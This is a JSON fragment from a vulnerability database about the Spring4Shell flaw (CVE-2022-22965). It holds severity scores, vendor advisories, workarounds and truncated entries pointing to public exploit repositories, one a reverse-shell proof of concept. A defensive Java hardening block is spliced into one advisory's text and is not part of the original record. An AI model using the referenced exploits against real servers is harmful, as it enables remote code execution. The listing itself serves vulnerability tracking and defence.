"acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45382", "CVE-2022-22674", "CVE-2022-22675", "CVE-2022-22965"], "modified": "2022-04-06T03:27:40", "id": "THN:9F9D436651F16F99B6EA52F0DB9AE75C", "href": "https://thehackernews.com/2022/04/cisa-warns-of-active-exploitation-of.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-04-08T19:29:06", "description": "A remote code execution vulnerability exists in Spring Core. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T00:00:00", "type": "checkpoint_advisories", "title": "Spring Core Remote Code Execution (CVE-2022-22965)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-05T00:00:00", "id": "CPAI-2022-0104", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "github": [{"lastseen": "2022-04-15T14:31:58", "description": "Spring Framework prior to versions 5.2.20 and 
5.3.18 contains a remote code execution vulnerability known as `Spring4Shell`. \n\n## Impact\n\nA Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.\n\nThese are the prerequisites for the exploit:\n- JDK 9 or higher\n- Apache Tomcat as the Servlet container\n- Packaged as WAR\n- `spring-webmvc` or `spring-webflux` dependency\n\n## Patches\n\n- Spring Framework [5.3.18](https://github.com/spring-projects/spring-framework/releases/tag/v5.3.18) and [5.2.20](https://github.com/spring-projects/spring-framework/releases/tag/v5.2.20.RELEASE)\n- Spring Boot [2.6.6](https://github.com/spring-projects/spring-boot/releases/tag/v2.6.6) and [2.5.12](https://github.com/spring-projects/spring-boot/releases/tag/v2.5.12)\n\n## Workarounds\n\nFor those who are unable to upgrade, leaked reports recommend setting `disallowedFields` on `WebDataBinder` through an `@ControllerAdvice`. This works generally, but as a centrally applied workaround fix, may leave some loopholes, in particular if a controller sets `disallowedFields` locally through its own `@InitBinder` method, which overrides the global setting.\n\nTo apply the workaround in a more fail-safe way, applications could extend `RequestMappingHandlerAdapter` to update the `WebDataBinder` at the end after all other initialization. 
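Written out as an added example (the editor's illustration, not code from the advisory or the Spring project), here is that fail-safe variant for a Spring Boot 2.x application on the Spring MVC servlet stack: a `WebMvcRegistrations` bean supplies an extended `RequestMappingHandlerAdapter` whose binder factory re-applies the `class.*` patterns after the global `WebBindingInitializer` and the controller's own `@InitBinder` methods have run, so a local `setDisallowedFields()` call can no longer replace them. The package name is hypothetical; the four patterns are the ones from the published interim workaround.

```java
package com.example.hardening; // hypothetical package; not part of the advisory

import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;

import org.springframework.boot.autoconfigure.web.servlet.WebMvcRegistrations;
import org.springframework.context.annotation.Configuration;
import org.springframework.web.bind.WebDataBinder;
import org.springframework.web.context.request.NativeWebRequest;
import org.springframework.web.method.annotation.InitBinderDataBinderFactory;
import org.springframework.web.method.support.InvocableHandlerMethod;
import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter;
import org.springframework.web.servlet.mvc.method.annotation.ServletRequestDataBinderFactory;

/**
 * Interim hardening for CVE-2022-22965 on Spring Boot 2.x + Spring MVC (servlet stack).
 * Spring Boot hands the adapter returned below to Spring MVC in place of the default one.
 * Its binder factory appends the class.* patterns AFTER every @InitBinder method has run,
 * so a controller that calls setDisallowedFields() itself cannot drop them.
 * Stopgap only: the fix is Spring Framework 5.3.18 / 5.2.20 (Spring Boot 2.6.6 / 2.5.12).
 */
@Configuration
public class BinderHardeningConfig implements WebMvcRegistrations {

    // Patterns from the published interim workaround. Both spellings are listed because
    // disallowedFields matching is case-sensitive in the unpatched versions.
    static final String[] CLASSLOADER_GUARD = { "class.*", "Class.*", "*.class.*", "*.Class.*" };

    @Override
    public RequestMappingHandlerAdapter getRequestMappingHandlerAdapter() {
        return new HardenedRequestMappingHandlerAdapter();
    }

    static final class HardenedRequestMappingHandlerAdapter extends RequestMappingHandlerAdapter {

        @Override
        protected InitBinderDataBinderFactory createDataBinderFactory(List<InvocableHandlerMethod> binderMethods) {
            return new ServletRequestDataBinderFactory(binderMethods, getWebBindingInitializer()) {
                @Override
                public void initBinder(WebDataBinder binder, NativeWebRequest request) throws Exception {
                    // The global WebBindingInitializer has already run; this call runs the
                    // controller's @InitBinder methods, which may call setDisallowedFields()...
                    super.initBinder(binder, request);
                    // ...so the guard patterns are merged in last and survive whatever they set.
                    binder.setDisallowedFields(withGuard(binder.getDisallowedFields()));
                }
            };
        }
    }

    /** Existing disallowed-field patterns plus the class.* guard, without duplicates. */
    static String[] withGuard(String[] existing) {
        List<String> merged = new ArrayList<>();
        if (existing != null) {
            merged.addAll(Arrays.asList(existing));
        }
        for (String pattern : CLASSLOADER_GUARD) {
            if (!merged.contains(pattern)) {
                merged.add(pattern);
            }
        }
        return merged.toArray(new String[0]);
    }
}
```

To confirm it took effect, post a `class.`-prefixed parameter to any `@ModelAttribute` endpoint: the field must appear in `BindingResult.getSuppressedFields()` rather than be bound. The WebFlux equivalent registers a `WebFluxRegistrations` bean and extends the reactive `RequestMappingHandlerAdapter` in the same way.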
In order to do that, a Spring Boot application can declare a `WebMvcRegistrations` bean (Spring MVC) or a `WebFluxRegistrations` bean (Spring WebFlux).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T18:30:50", "type": "github", "title": "Remote Code Execution in Spring Framework", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-01T16:26:09", "id": "GHSA-36P3-WJMG-H94X", "href": "https://github.com/advisories/GHSA-36p3-wjmg-h94x", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2022-04-13T15:23:10", "description": "# CVE-2022-22965\nSpring4Shell (CVE-2022-22965)\n\n## Usage\n\n### 1....", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 
5.9}, "published": "2022-04-01T12:37:32", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-13T04:23:45", "id": "1F4670D2-70D1-5F68-B5BB-2674FB754D26", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-11T17:49:10", "description": "# irule-cve-2022-22965\n\nThis is a basic iRule to provide some mi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-06T02:17:36", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 
"impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-06T20:12:07", "id": "A8866ED4-A944-571F-8135-6138A2E9B568", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-11T17:48:57", "description": "# CVE-2022-22965 PoC - Payara Arbitrary File Download\n\nMinimal e...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-07T15:26:15", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-08T12:25:13", "id": "661FCFFE-E5C3-5CF9-9CD5-68869CEDED1E", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-11T17:49:43", "description": "# CVE-2022-22965\n\n[Spring Framework/CVE-2022-22965](https://cve....", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", 
"availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T06:50:21", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-05T12:12:05", "id": "D09EAEC3-7B66-5E76-BF91-64C048C7D58D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-27T04:37:08", "description": "# spring-core-rce \nspring core rce \u7b80\u5355\u5229\u7528 \n\nwar\u53ef\u4ee5\u4f7f\u7528 \nhttps://gi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T13:02:18", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, 
"cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-27T02:56:25", "id": "81DFF6A6-4518-543A-B06C-E7A6466ACB88", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-11T17:49:19", "description": "# Spring4shell RCE vulnerability\n\nThis vulnerability affects Spr...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-04T20:16:06", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-04T21:09:58", "id": "89B78640-ACE2-5A00-845E-1CEFFFDD4A2E", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-11T17:49:14", 
"description": " Nmap (NSE...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-07T00:08:16", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-05T02:15:39", "id": "B158F1AE-13DF-5F49-88D5-73B5B6183926", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-26T19:59:33", "description": "# spring-rec-demo\n\nThe demo code showing the recent Spring4Shell...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-06T04:17:51", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", 
"bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-26T19:31:44", "id": "69C8078C-1B8D-5B51-8951-4342A675A93D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-27T03:13:13", "description": "# CVE-2022-22965 poc\nCVE-2022-22965 poc including reverse-shell ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T19:19:52", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": 
"2022-04-25T07:43:27", "id": "0018F9FA-176E-52D1-B790-5C67C302BC74", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-15T01:21:03", "description": "# Spring-Core-RCE Spring Framework \u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\uff08CVE-2022-22965\uff09\nSpri...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-02T09:13:54", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-14T23:33:13", "id": "EE4B4CDB-5690-556D-9581-E198CF03A9BE", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-15T01:22:15", "description": "# Spring-Core-RCE Spring Framework \u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\uff08CVE-2022-22965\uff09\nSpri...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", 
"availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-02T09:13:54", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-14T23:33:13", "id": "A0648F78-7165-5CA8-82DC-B34350E2DDC6", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-15T01:22:44", "description": "# Safer_PoC_CVE-2022-22965\nA Safer PoC for CVE-2022-22965 (Sprin...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T16:58:56", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", 
"confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-14T23:33:55", "id": "9538B7BA-979F-523C-9913-4FE62CF77C5C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-14T19:20:16", "description": "# Spring4shell_behinder\n\n## \u8fd9\u662f\u4ec0\u4e48?\n\n\u4e00\u4e2a\u9488\u5bf9spring4shell\u6f0f\u6d1e(CVE-2022-2...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-07T03:50:14", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-14T11:40:41", "id": "7883CC8E-9B35-5C0F-AE2E-271FAC17648B", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": 
"2022-04-05T15:15:16", "description": "# Spring Framework RCE exploitation (Quick pentest notes)\n\n<p al...", "cvss3": {}, "published": "2022-03-31T15:43:06", "type": "githubexploit", "title": "Exploit for CVE-2022-22965", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-05T13:15:56", "id": "EF55EC2D-994E-5971-8941-B595536F5992", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-04-11T17:49:27", "description": "# Spring4Shell(CVE-2022-22965)\n\nSpring Framework RCE via Data Bi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T13:35:01", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-06T08:35:57", "id": 